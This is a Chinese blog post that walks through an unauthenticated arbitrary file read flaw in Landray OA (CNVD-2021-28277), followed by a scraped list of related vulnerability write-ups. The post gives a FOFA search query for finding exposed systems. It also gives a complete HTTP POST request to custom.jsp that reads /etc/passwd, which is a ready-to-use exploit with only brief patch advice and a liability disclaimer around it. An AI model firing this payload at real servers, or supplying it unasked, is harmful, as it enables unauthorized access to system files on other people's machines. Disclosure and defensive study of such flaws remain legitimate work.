近期CNVD爆出漏洞编号:CNVD-2021-28277,首次公开日期为2021-04-15,蓝凌oa存在多个漏洞,攻击者可利用该漏洞获取服务器控制权。今天挑选一个蓝凌OA前台任意文件读取漏洞进行分析使用。链接:https://www.cnvd.org.cn/flaw/show/CNVD-2021-28277

蓝凌简介:蓝凌软件全称深圳市蓝凌软件股份有限公司,于2001年在深圳科技园成立。蓝凌是国内知名的大平台OA服务商和国内领先的知识管理解决方案提供商,是专业从事组织的知识化咨询、软件研发、实施、技术服务的国家级高新技术企业,近期Landray-OA系统被爆出存任意文件读取漏洞。

一、漏洞位置

FOFA网络空间引擎,FOFA语法:app="Landray-OA系统"

打开测试网站前台登录页面:

漏洞的路径在 xxxxx/sys/ui/extend/varkind/custom.jsp下面,也就是custom.jsp里面,需要使用post请求方式,请求的参数为var={"body":{"file":"file:///etc/passwd"}}

使用hackbar火狐插件修改为post请求传递参数,打开 xxxxx/sys/ui/extend/varkind/custom.jsp为如下画面显示

二、漏洞验证

可以看见,只需对file里面的参数进行修改,就可以任意读取系统文件passwd信息的高危漏洞;

或者使用burp测试:

漏洞payload为

POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: xxxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=EA419896062AC4B6FE325FF08B8AF36E
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 44

var={"body":{"file":"file:///etc/passwd"}}

修复建议:建议使用蓝凌OA的系统更新系统至最新版本,附录地址:https://www.landray.com.cn/

特别声明:

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,我不为此承担任何责任。

作者有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者的允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。切勿用于非法,仅供学习参考

蓝凌OA前台任意文件读取漏洞利用相关推荐

  1. php mail执行命令,PHPMailer 命令执行 任意文件读取漏洞利用 【含POC】

    PHPMailer 命令执行漏洞(CVE-2016-10033) 漏洞编号:CVE-2016-10033 影响版本:PHPMailer< 5.2.18 漏洞级别: 高危 漏洞POC: PHPMa ...

  2. WeiPHP5.0 前台任意文件读取

    本博客已搬迁至:https://n0puple.github.io/ 此处不再更新文章 本文仅用于技术讨论与研究,文中的实现方法切勿应用在任何违法场景.如因涉嫌违法造成的一切不良影响,本文作者概不负责 ...

  3. 文件上传漏洞_通达OA前台任意文件上传漏洞+文件包含漏洞导致getshell

    点击蓝字|关注我们 通达OA前台任意文件上传漏洞 +文件包含漏洞导致getshell 一.漏洞介绍/Profile/ 通达OA介绍: 通达OA(Office Anywhere网络智能办公系统)是由北京 ...

  4. phpcms前台注入导致任意文件读取漏洞

    关于:phpcms前台注入导致任意文件读取漏洞的修复问题 简介: phpcms的/phpcms/modules/content/down.php文件中,对输入参数 $_GET['a_k']未进行严格过 ...

  5. 一米OA任意文件读取漏洞

    漏洞描述 一米OA getfile.jsp文件过滤不足,导致任意文件读取漏洞 漏洞影响 一米OA 网络测绘 app="一米OA" 漏洞复现 出现漏洞的文件 <%@

  6. 蓝海卓越计费管理系统漏洞学习——download.php 任意文件读取漏洞

    警告 请勿使用本文提到的内容违反法律. 本文不提供任何担保 目录 警告 一.概述 二.影响版本 三.漏洞复现 一.概述 蓝海卓越计费管理系统 download.php文件存在任意文件读取漏洞,攻击者通 ...

  7. 蓝海卓越 计费管理系统 download.php 任意文件读取漏洞

    漏洞描述: 蓝海卓越计费管理系统 download.php文件存在任意文件读取漏洞,攻击者通过 ../ 遍历目录可以读取服务器上的敏感文件. 漏洞利用条件: / 漏洞影响范围: / 漏洞复现: 1.P ...

  8. php 打开任意文件下载,TEC-004-php文件下载任意文件读取漏洞修复

    修改download?u参数值,将/public/files/14842030529.txt,替换为../../../../../../../../../../etc/passwd function ...

  9. 安全研究 | Jenkins 任意文件读取漏洞分析

    欢迎大家前往腾讯云+社区,获取更多腾讯海量技术实践干货哦~ 本文由云鼎实验室 发表于云+社区专栏 一.漏洞背景 漏洞编号:CVE-2018-1999002 漏洞等级:高危 Jenkins 7 月 18 ...

  10. .exp文件_mini_httpd 任意文件读取漏洞(附EXP脚本)

    一.环境搭建: 进入镜像目录: cd vulhub/mini_httpd/CVE-2018-18778 启动环境: docker-compose up -d 访问8088端口 二.漏洞描述: Mini ...

最新文章

  1. Genome Biology:人体各部位微生物组时间序列分析
  2. 【6】Zookeeper脚本及API
  3. 手把手教你做关键词匹配项目(搜索引擎)---- 第九天
  4. 力扣刷题心得(设计类题目)
  5. c语言用星号输出沙漏,《算法笔记》学习日记——3.3 图形输出
  6. 任务栏恢复添加快捷方式(即桌快出现箭头)
  7. Linux+屏蔽脚本,Linux之劫持rm命令实现安全删除和屏蔽删除/、/*脚本
  8. python中jieba分词快速入门
  9. JavaScript框架从入门到精通
  10. vue-json-editor高度调整
  11. 图片降噪软件哪个好?不如试试Topaz DeNoise AI
  12. mac远程控制程序:AnyDesk for Mac
  13. 查看电脑连接过的无线网密码
  14. 微信图片怎样在pc 端打开查看并导出
  15. 【多模态】Multi-modal chemical information reconstruction from images and texts for exploring the
  16. 简单制作《坦克大战》
  17. Halide学习笔记----Halide tutorial源码阅读2
  18. 注册德国商标的流程以及德国商标的异议
  19. 两名老人接力营救轻生女子一人溺亡
  20. 诺依曼计算机组成,1.1.2 冯·诺依曼计算机模型

热门文章

  1. ROS学习之CMakelists.txt和package.xml
  2. 蔡康永的说话之道2-笔记
  3. 安装win10 ltsc应用商店
  4. 联发科mt6779(Helio P90),mt6775(Helio P70),MT6771(Helio P60),Helio P35,MT6762(Helio P22)处理器参数介绍
  5. 使用Adb shell dumpsys检测Android的Activity任务栈
  6. 帝恩思:网站被劫持跳转怎么办?
  7. (收藏)盘点阿里巴巴 15 款开发者工具
  8. 51CTO下载-千万级大型系统集成项目
  9. 美化 PowerShell
  10. The Bequeath Protocol Adapter [ID 16653.1]